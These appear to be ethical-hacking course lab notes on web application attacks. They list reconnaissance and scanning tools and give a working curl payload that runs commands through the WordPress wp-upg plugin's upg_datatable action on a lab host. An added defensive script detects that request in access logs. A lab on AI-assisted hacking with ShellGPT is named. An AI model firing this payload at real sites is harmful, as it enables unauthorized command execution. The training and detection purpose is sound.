Module 14: Hacking Web Applications

Ethical hackers or pen testers use numerous tools and techniques to perform web application attacks on the target web application. Recommended labs that will assist you in learning various web application attack techniques include:

  1. Footprint the web infrastructure

    • Perform web application reconnaissance using Nmap and Telnet

    • Perform web spidering using OWASP ZAP

    • Perform web application vulnerability scanning using SmartScanner

  2. Perform web application attacks

    • Perform a brute-force attack using Burp Suite

    • Perform Remote Code Execution (RCE) attack

  3. Detect web application vulnerabilities using various web application security tools

    • Detect web application vulnerabilities using the Wapiti web application security scanner

  4. Perform web application hacking using AI

    • Perform web application hacking using ShellGPT

Lab 1: Footprint the Web Infrastructure

Task 1: Perform Web Application Reconnaissance using Nmap and Telnet

## Tools that can be used in this section (WHOIS lookup):
1. Netcraft (https://www.netcraft.com)
2. SmartWhois (https://www.tamos.com)
3. WHOIS Lookup (https://whois.domaintools.com)
4. Batch IP Converter (http://www.sabsoft.com)
## Tools used in this section:
1. Nmap
2. OWASP ZAP
3. SmartScanner (Windows)
4. WPScan Vulnerability Database (https://wpscan.com)
5. Codename SCNR (https://ecsypno.com)
6. AppSpider (https://www.rapid7.com)
7. Uniscan (https://github.com)
8. N-Stalker (https://www.nstalker.com)

Lab 2: Perform Web Application Attacks

Task 1: Perform a Brute-force Attack using Burp Suite

Password brute-forcing with Burp Suite Intruder

Task 2: Perform Remote Code Execution (RCE) Attack

The vulnerable WordPress site is hosted on [target]/CEH
Vulnerable WordPress plugin: User Post Gallery (wp-upg)

  • WordPress scanner (WPScan):

    wpscan --url http://10.10.1.22:8080/CEH --api-token [API Token]

  • Payload (calls the plugin's upg_datatable AJAX action with exec and whoami in the field parameter):

    curl -i 'http://10.10.1.22:8080/CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL'
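
A defender-side check for the request shown above, as an added example (not part of the original lab notes or the plugin's code): it scans web-server access log lines for `upg_datatable` AJAX calls whose `field` parameter names a PHP command-execution function. The log lines are constructed, and the `label:callback:argument` layout of `field` is an assumption inferred from the payload on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# PHP functions that run OS commands (the usual disable_functions candidates).
PHP_EXEC_FUNCS = {"exec", "system", "passthru", "shell_exec", "popen", "proc_open"}
# Client IP, request URI and status from a common/combined-format log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return None for unrelated lines, else a finding for an upg_datatable call."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["uri"])
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also decodes %3A to ':'
    if "upg_datatable" not in params.get("action", []):
        return None
    finding = {"ip": m["ip"], "status": m["status"], "severity": "review", "callback": "", "argument": ""}
    for value in params.get("field", []):
        parts = value.split(":")
        # Assumed layout, inferred from the payload on this page: label:callback:argument:...
        callback = parts[1].strip().lower() if len(parts) > 1 else ""
        if callback in PHP_EXEC_FUNCS:
            finding.update(severity="high", callback=callback, argument=parts[2] if len(parts) > 2 else "")
            break
    return finding

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = [
    '10.10.1.13 - - [01/Jan/2024:10:00:00 +0000] "GET /CEH/ HTTP/1.1" 200 5120',
    '10.10.1.13 - - [01/Jan/2024:10:00:05 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:whoami:NULL:NULL HTTP/1.1" 200 87',
    '10.10.1.13 - - [01/Jan/2024:10:00:09 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=upg_datatable&field=field%3AEXEC%3Awhoami%3ANULL%3ANULL HTTP/1.1" 200 87',
    '10.10.1.50 - - [01/Jan/2024:10:01:00 +0000] "GET /CEH/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12',
    '10.10.1.50 - - [01/Jan/2024:10:02:00 +0000] "POST /CEH/wp-admin/admin-ajax.php?action=upg_datatable HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a `field` value sent in a POST body shows up as a `review` finding here and needs WAF or application-level logging to inspect.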

Lab 3: Detect Web Application Vulnerabilities using Various Web Application Security Tools

  1. Wapiti3

    cd wapiti
    python3 -m venv wapiti3
    . wapiti3/bin/activate
    pip install .

    wapiti -u https://www.certifiedhacker.com
    cd /root/.wapiti/generated_report/

Lab 4: Perform Web Application Hacking using AI

Tools used in this section:
1. wafw00f
2. Sn1per
3. Dirb
4. Gobuster
5. Wfuzz
